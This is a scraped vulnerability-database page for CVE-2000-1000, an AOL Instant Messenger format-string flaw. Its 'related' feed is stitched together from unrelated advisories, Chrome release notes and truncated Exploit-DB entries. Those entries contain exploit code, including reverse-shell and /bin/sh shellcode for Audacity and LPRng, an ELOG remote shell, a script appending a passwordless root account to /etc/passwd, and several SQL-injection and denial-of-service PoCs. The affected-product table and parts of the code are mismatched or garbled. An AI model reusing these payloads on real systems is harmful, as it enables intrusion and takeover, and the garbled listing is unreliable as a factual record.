CVE-2000-1000
published 2000-12-11CVE-2000-1000: Format string vulnerability in AOL Instant Messenger (AIM) 4.1.2010 allows remote attackers to cause a denial of service and possibly execute arbitrary…
PriorityP418medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
2.21%
80.4th percentile
Format string vulnerability in AOL Instant Messenger (AIM) 4.1.2010 allows remote attackers to cause a denial of service and possibly execute arbitrary commands by transferring a file whose name includes format characters.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aol | instant_messenger | — | — |
| chrome_chrome | — | — | |
| ws_project | ws | >= 5.0.0 < 5.2.3 | 5.2.3 |
| ws_project | ws | >= 6.0.0 < 6.2.2 | 6.2.2 |
| ws_project | ws | >= 7.0.0 < 7.4.6 | 7.4.6 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
LiquidJS Vulnerable to ReDoS via Quadratic Backtracking in `strip_html` Filter Regex
ghsa·2026-05-27
CVE-2026-45617 [HIGH] CWE-1333 LiquidJS Vulnerable to ReDoS via Quadratic Backtracking in `strip_html` Filter Regex
LiquidJS Vulnerable to ReDoS via Quadratic Backtracking in `strip_html` Filter Regex
## Summary
The built-in `strip_html` filter in liquidjs uses a regex containing four lazy-quantified alternatives. When the input contains many `|||/g, '')
}
```
The regex contains four lazy patterns:
1. ``
2. ``
3. ``
4. ``
For an input like `' {
for (const n of [1000, 2000, 4000, 8000, 16000]) {
const payload = ' {
const payload = ')[^|)[^|)[^-]*)*-->|]*>/g,
''
)
```
This unrolls each lazy quantifier so each ``, ``, comment, or generic tag, and emit nothing for those ranges.
Either fix should be combined with charging the regex output cost honestly to `memoryLimit` and (defensively) capping input length up front:
```ts
export function strip_html (this: FilterImpl, v: string) {
const str = stringify(
GHSA
GHSA-h2qf-prm2-vch5: Format string vulnerability in AOL Instant Messenger (AIM) 4
ghsa_unreviewed·2022-04-30
CVE-2000-1000 [MEDIUM] GHSA-h2qf-prm2-vch5: Format string vulnerability in AOL Instant Messenger (AIM) 4
Format string vulnerability in AOL Instant Messenger (AIM) 4.1.2010 allows remote attackers to cause a denial of service and possibly execute arbitrary commands by transferring a file whose name includes format characters.
GHSA
ReDoS in Sec-Websocket-Protocol header
ghsa·2021-05-28
CVE-2021-32640 [MEDIUM] CWE-345 ReDoS in Sec-Websocket-Protocol header
ReDoS in Sec-Websocket-Protocol header
### Impact
A specially crafted value of the `Sec-Websocket-Protocol` header can be used to significantly slow down a ws server.
### Proof of concept
```js
for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {
const value = 'b' + ' '.repeat(length) + 'x';
const start = process.hrtime.bigint();
value.trim().split(/ *, */);
const end = process.hrtime.bigint();
console.log('length = %d, time = %f ns', length, end - start);
}
```
### Patches
The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff) and backported to [email protected] (https://github.com/websockets/ws/commit/78c676d2a1acefbc05292e9f7ea0a9457704bf1b) and [email protected] (https://github.com/websockets/ws/commit/76d47c147900202
Chrome
Stable Channel Update for Desktop: CVE-2026-14024
vendor_chrome·2026-06-30
CVE-2026-14024 [MEDIUM] Stable Channel Update for Desktop: CVE-2026-14024
Stable Channel Update for Desktop
CVE-2026-14024: Use after free in Ozone. Reported by Google on 2026-05-30 [$2000][ 506482786 ] Low CVE-2026-14025: Use after free in Views
Reported by asjidkalam on 2026-04-26 [$1000][ 507263861 ] Low CVE-2026-14026: Incorrect security UI in SplitView
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2025-11211
vendor_chrome·2025-09-30·CVSS 7.5
CVE-2025-11211 [MEDIUM] Stable Channel Update for Desktop: CVE-2025-11211
Stable Channel Update for Desktop
CVE-2025-11211: Out of bounds read in Media. Reported by Kosir Jakob on 2025-08-29 [$2000][ 420734141 ] Medium CVE-2025-11212: Inappropriate implementation in Media
Reported by Ameen Basha M K on 2025-05-28 [$1000][ 443408317 ] Medium CVE-2025-11213: Inappropriate implementation in Omnibox
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2025-3067
vendor_chrome·2025-04-01·CVSS 8.6
CVE-2025-3067 [MEDIUM] Stable Channel Update for Desktop: CVE-2025-3067
Stable Channel Update for Desktop
CVE-2025-3067: Inappropriate implementation in Custom Tabs. Reported by Philipp Beer (TU Wien) on 2024-10-31 [$2000][ 401823929 ] Medium CVE-2025-3068: Inappropriate implementation in Intents
Reported by Simon Rawet on 2025-03-09 [$1000][ 40060076 ] Medium CVE-2025-3069: Inappropriate implementation in Extensions
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2024-7975
vendor_chrome·2024-08-21·CVSS 4.3
CVE-2024-7975 [MEDIUM] Stable Channel Update for Desktop: CVE-2024-7975
Stable Channel Update for Desktop
CVE-2024-7975: Inappropriate implementation in Permissions. Reported by Thomas Orlita on 2024-06-16 [$2000][ 339654392 ] Medium CVE-2024-7976: Inappropriate implementation in FedCM
Reported by Alesandro Ortiz on 2024-05-10 [$1000][ 324770940 ] Medium CVE-2024-7977: Insufficient data validation in Installer
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2024-3845
vendor_chrome·2024-04-16·CVSS 4.3
CVE-2024-3845 [LOW] Stable Channel Update for Desktop: CVE-2024-3845
Stable Channel Update for Desktop
CVE-2024-3845: Inappropriate implementation in Network. Reported by Daniel Baulig on 2024-02-03 [$2000][ 40064754 ] Low CVE-2024-3846: Inappropriate implementation in Prompts
Reported by Ahmed ElMasry on 2023-05-23 [$1000][ 328690293 ] Low CVE-2024-3847: Insufficient policy enforcement in WebUI
Severity: low
Chrome
Stable Channel Update for Desktop: CVE-2024-2629
vendor_chrome·2024-03-19·CVSS 4.3
CVE-2024-2629 [MEDIUM] Stable Channel Update for Desktop: CVE-2024-2629
Stable Channel Update for Desktop
CVE-2024-2629: Incorrect security UI in iOS. Reported by Muneaki Nishimura (nishimunea) on 2024-01-02 [$1000][ 41481877 ] Medium CVE-2024-2630: Inappropriate implementation in iOS
Reported by James Lee (@Windowsrcer) on 2023-12-07 [$2000][ 41495878 ] Low CVE-2024-2631: Inappropriate implementation in iOS
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2023-0702
vendor_chrome·2023-02-07·CVSS 8.8
CVE-2023-0702 [MEDIUM] Stable Channel Update for Desktop: CVE-2023-0702
Stable Channel Update for Desktop
CVE-2023-0702: Type Confusion in Data Transfer. Reported by Sri on 2022-04-14 [$1000][ 1405574 ] Medium CVE-2023-0703: Type Confusion in DevTools
Reported by raven at KunLun lab on 2023-01-07 [$2000][ 1385982 ] Low CVE-2023-0704: Insufficient policy enforcement in DevTools
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2023-0138
vendor_chrome·2023-01-10·CVSS 8.8
CVE-2023-0138 [LOW] Stable Channel Update for Desktop: CVE-2023-0138
Stable Channel Update for Desktop
CVE-2023-0138: Heap buffer overflow in libphonenumber. Reported by Michael Dau on 2022-07-23 [$2000][ 1367632 ] Low CVE-2023-0139: Insufficient validation of untrusted input in Downloads
Reported by Axel Chong on 2022-09-24 [$1000][ 1326788 ] Low CVE-2023-0140: Inappropriate implementation in File System API
Severity: low
Chrome
Stable Channel Update for Desktop: CVE-2022-1856
vendor_chrome·2022-05-24·CVSS 8.8
CVE-2022-1856 [HIGH] Stable Channel Update for Desktop: CVE-2022-1856
Stable Channel Update for Desktop
CVE-2022-1856: Use after free in User Education. Reported by Nan Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2022-05-06 [$2000][ 1227995 ] High CVE-2022-1857: Insufficient policy enforcement in File System API
Reported by Daniel Rhea on 2021-07-11 [$1000][ 1314310 ] High CVE-2022-1858: Out of bounds read in DevTools
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2021-38017
vendor_chrome·2021-11-15·CVSS 8.8
CVE-2021-38017 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-38017
Stable Channel Update for Desktop
CVE-2021-38017: Insufficient policy enforcement in iframe sandbox. Reported by NDevTK on 2021-10-05 [$2000][ 1197889 ] Medium CVE-2021-38018: Inappropriate implementation in navigation
Reported by Alesandro Ortiz on 2021-04-11 [$1000][ 1251179 ] Medium CVE-2021-38019: Insufficient policy enforcement in CORS
Severity: medium
No detection rules found.
Exploit-DB
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
exploitdb·2019-08-12·CVSS 9.8
CVE-2019-12255 [CRITICAL] VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
---
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *
if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)
seq_num = seq_num + 1
ack_num = syn
Exploit-DB
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
exploitdb·2017-03-22
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
---
SEC Consult Vulnerability Lab Security Advisory
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://www.solar-log.com/de/home.html
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
Vendor description:
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in
Exploit-DB
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
exploitdb·2009-08-24
CVE-2009-0490 Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
---
#!/usr/bin/env python
#
# Audacity
print " [+] Creating eviL .gro file..."
buff = ("\x44" * 174)
buff += ("\xEB\x08\x90\x90")
buff += ("\x22\x23\x17\x01")
buff += "\x90"* 4
buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x57\x30\x30\x54" # this is the egg...
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buff += ("\xCC" * 1000);
buff += "W00TW00T"
# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4
Exploit-DB
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
exploitdb·2009-02-02
CVE-2009-1808 Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
---
// source: https://www.securityfocus.com/bid/35120/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
#include
int main()
{
WCHAR c[1000] = {0};
memset(c, �c�, 1000);
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
WCHAR b[1000] = {0};
SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
return 0;
}
Exploit-DB
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
exploitdb·2007-07-18
CVE-2007-3764 Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
Asterisk
#include
#include
#include
#include
#include
#include
#include
#include
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabil
Exploit-DB
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
exploitdb·2007-05-23
CVE-2007-2903 Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
---
2007/05/23
Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
# milw0rm.com [2007-05-23]
Exploit-DB
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
exploitdb·2007-02-19
CVE-2007-1034 PHP-Nuke Module Emporium 2.3.0 - SQL Injection
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem
Exploit-DB
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
exploitdb·2007-02-08
CVE-2007-0904 LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If
Exploit-DB
LushiWarPlaner 1.0 - 'register.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0864 LushiWarPlaner 1.0 - 'register.php' SQL Injection
LushiWarPlaner 1.0 - 'register.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If isl
Exploit-DB
LushiNews 1.01 - 'comments.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0865 LushiNews 1.01 - 'comments.php' SQL Injection
LushiNews 1.01 - 'comments.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem =
Exploit-DB
PHP League 0.82 - 'classement.php' SQL Injection
exploitdb·2006-10-27
CVE-2006-5676 PHP League 0.82 - 'classement.php' SQL Injection
PHP League 0.82 - 'classement.php' SQL Injection
---
exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
Php League v0.82 (classement.php) Remote SQL Injection Exploit
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
Php Leaguev0.82 (classement.p
Exploit-DB
ELOG 2.5.6 - Remote Shell
exploitdb·2005-02-09
CVE-2005-0439 ELOG 2.5.6 - Remote Shell
ELOG 2.5.6 - Remote Shell
---
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBAC
Exploit-DB
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
exploitdb·2004-08-11
CVE-2004-1714 Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
---
source: https://www.securityfocus.com/bid/10915/info
It is reported that BlackICE PC Protection is prone to a local buffer overrun when handling excessive input in certain configuration directives parsed from the firewall.ini file included with the software.
It is reported that when the system is restarted, and the affected software reads the malicious firewall.ini file both the blackice.exe and blackd.exe executables will crash.
REJECT, 138, default, 1999-07-22 20:26:53, AAAAAAAAAAAAAAAAA.... , 2000,
unknown
(Aprox 1000 A's)
Exploit-DB
LPRng 3.6.22/23/24 - Remote Command Execution
exploitdb·2000-12-11
CVE-2000-0917 LPRng 3.6.22/23/24 - Remote Command Execution
LPRng 3.6.22/23/24 - Remote Command Execution
---
/*
* LPRng remote root exploit for x86 Linux
* 9/27/00
*
* - sk8
* tested on compiled LPRng 3.6.22/23/24
*
*/
#include
#include
char sc[]=
"\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff"
"\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39"
"\xf9\x75\xf5\x39\xd3\x7e\xee\xeb\x19\x5e\x89\xf3\x89\xf7\x83\xc7"
"\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x0b"
"\xcd\x80\xe8\xe2\xff\xff\xff/bin/sh";
#define NOP 0x90 //will be split up, doesn't matter
int main(int argc, char** argv) {
char getbuf[1000];
int bpad=0; /* was 2 */ /* 3 for other */
/* 2 - -34
3 - -41
0 - -42
*/
int i=0;
int eiploc=0x41424344;
char buffer[1024];
char fmtbuf[128];
int shloc=-1; //0xbffff2c8;
int hi=100;
int lo=200;
i
Exploit-DB
PragmaSys TelnetServer 2000 - rexec Buffer Overflow
exploitdb·2000-08-24
CVE-2000-1002 PragmaSys TelnetServer 2000 - rexec Buffer Overflow
PragmaSys TelnetServer 2000 - rexec Buffer Overflow
---
source: https://www.securityfocus.com/bid/1605/info
Pragma Systems offers a windows remote access server called TelnetServer 2000. TelnetServer crashes if more than 1000 NULL characters are sent to its rexec port, 512. This can be executed by an anonymous attacker from anywhere on the internet. It is not known whether this apparent overflow can be exploited to gain access on the victim host.
#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# send 5k of null causes the server to crash.
#########################################################
#
# ./$0.pl -s -p
#
# Null request DoS
#
use Getopt::Std;
use Socket;
getopts('s:p', \%args);
if(!defined($args{s})){&usage;}
Exploit-DB
BeOS 5.0 - TCP Fragmentation Remote Denial of Service
exploitdb·2000-05-18
CVE-2000-0463 BeOS 5.0 - TCP Fragmentation Remote Denial of Service
BeOS 5.0 - TCP Fragmentation Remote Denial of Service
---
source: https://www.securityfocus.com/bid/1222/info
BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot.
[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%
1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 pack
Exploit-DB
Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow
exploitdb·2000-03-16
CVE-2000-0239 Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow
Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow
---
source: https://www.securityfocus.com/bid/1056/info
WebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail Server which allows a user to access email through a web browser.
Insufficient boundary checking exists in the code which handles GET requests, specifically on port 1080. Issuing a GET request containing a string of over 1000 characters on port 1080 will cause the WebView WebMail-Client application to crash.
eg.
http: //target/&mail_user=
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-1.exe
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-2.zip
Exploit-DB
Corel Linux OS 1.0 - Dosemu Distribution Configuration
exploitdb·2000-03-02
CVE-2000-0193 Corel Linux OS 1.0 - Dosemu Distribution Configuration
Corel Linux OS 1.0 - Dosemu Distribution Configuration
---
source: https://www.securityfocus.com/bid/1030/info
A vulnerability exists in the configuration of Dosemu, the DOS emulator, as shipped with Corel Linux 1.0. Dosemu documentation cautions that the system.com binary should not be made available to users, as it implements the system() libc call. Users can use this command to execute commands as root, and obtain elevated access to the system.
This "vulnerability" has been documented in the Dosemu documentation for a number of years.
Script started on Fri Feb 25 13:54:00 2000
nebula:~$ id
uid=1000(suid) gid=1000(suid) groups=1000(suid)
nebula:~$ cat > hack-corel
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
^D
nebula:~$ chmod a+rx hack-corel
nebula:~$ export PATH="$PAT
Exploit-DB
Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service
exploitdb·2000-01-18
CVE-2000-0211 Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service
Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service
---
// source: https://www.securityfocus.com/bid/1000/info
// Misordered handshake sequences sent to a Windows Media Unicast Server via Windows Media Player will cause the server to crash. Restarting the Unicast Service, including any open sessions during the time of the crash, is required in order to regain normal functionality. This is due to the dependency of the application on successfully completing asychronous handshake requests in a proper sequential order between the client and the server.
/*
*
* Jan-18-2000
*
* [ http://www.rootshell.com/ ]
*
* Microsoft Media Server 4.1 - Denial of Service Attack
*
* This code will crash the Microsoft Media Unicast Server for
* Windows NT. We have tested this agai
Exploit-DB
AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow
exploitdb·1999-12-31
CVE-2000-0011 AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow
AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow
---
source: https://www.securityfocus.com/bid/906/info
The SimpleServer:WWW personal webserver package from AnalogX can be compromised due to an overflowable buffer. If a GET request longer than 1000 bytes is received, the software will crash and data from the request gets pased to the EIP, meaning that an exploit could be created to run arbitrary code.
DoS attack:
GET [1000 bytes] HTTP/1.1
Exploit-DB
Windowmaker wmmon 1.0 b2 - Command Execution
exploitdb·1999-12-22
CVE-2000-0018 Windowmaker wmmon 1.0 b2 - Command Execution
Windowmaker wmmon 1.0 b2 - Command Execution
---
source: https://www.securityfocus.com/bid/885/info
WMMon is a multiple platform Window Maker docking application. It monitors useful system information such as CPU load and disk activity. The application also allows the user to define commands that can be launched by mouse clicks in the WMMon window. If the WMMon application is installed SUID or SGID, these privileges are not dropped before executing commands that have been defined by the user. Since the user can configure the application to execute any command, a user can run a shell or any other executable with the privileges that WMMon has been installed with. The FreeBSD ports version of WMMon installs SGID kmem and older versions installed it as SUID root.
Exploit:
% id
uid=1000(ste
No writeups or analysis indexed.
2000-12-11
Published